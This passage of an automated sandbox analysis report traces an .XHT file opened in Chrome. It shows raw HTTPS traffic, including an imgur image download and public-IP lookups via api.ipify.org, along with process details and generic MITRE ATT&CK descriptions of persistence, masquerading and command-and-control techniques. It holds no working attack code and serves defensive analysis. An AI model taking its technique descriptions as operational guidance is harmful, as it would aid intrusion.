c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-27 18:07:30 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.16	49723	151.101.44.193	443	7116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 18:07:30 UTC	386	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 18:07:30 UTC	761	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 27 Mar 2025 18:07:30 GMT Age: 2850923 X-Served-By: cache-iad-kjyo7100129-IAD, cache-nyc-kteb1890024-NYC X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 13, 1 X-Timer: S1743098851.698558,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.16	49737	104.26.12.205	443	7116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 18:08:01 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 18:08:02 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 18:08:02 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9270d4ac7c8ceda1-EWR server-timing: cfL4;desc="?proto=TCP&rtt=90104&min_rtt=89366&rtt_var=19601&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=34185&cwnd=252&unsent_bytes=0&cid=408fb0825ee8747a&ts=238&x=0"
2025-03-27 18:08:02 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.16	49738	172.67.74.152	443	7116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 18:08:02 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 18:08:02 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 18:08:02 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9270d4afaea88c53-EWR server-timing: cfL4;desc="?proto=TCP&rtt=89733&min_rtt=89181&rtt_var=19370&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=34261&cwnd=227&unsent_bytes=0&cid=642594b580472487&ts=247&x=0"
2025-03-27 18:08:02 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Statistics

CPU Usage

• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 6924, Parent PID: 4100

Function Logs

General

Target ID:	0
Start time:	14:07:22
Start date:	27/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#UD83D~1.XHT
Imagebase:	0x7ff77eaf0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Registry Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

COM Activities

WMI Operations

Show Windows behavior

Process Activities

Process Created

Process Terminated

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Windows UI Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Token Activities

Token Adjusted

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7116, Parent PID: 6924

Function Logs

General

Target ID:	1
Start time:	14:07:23
Start date:	27/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,2843365176371782232,8006201269056333489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3
Imagebase:	0x7ff77eaf0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

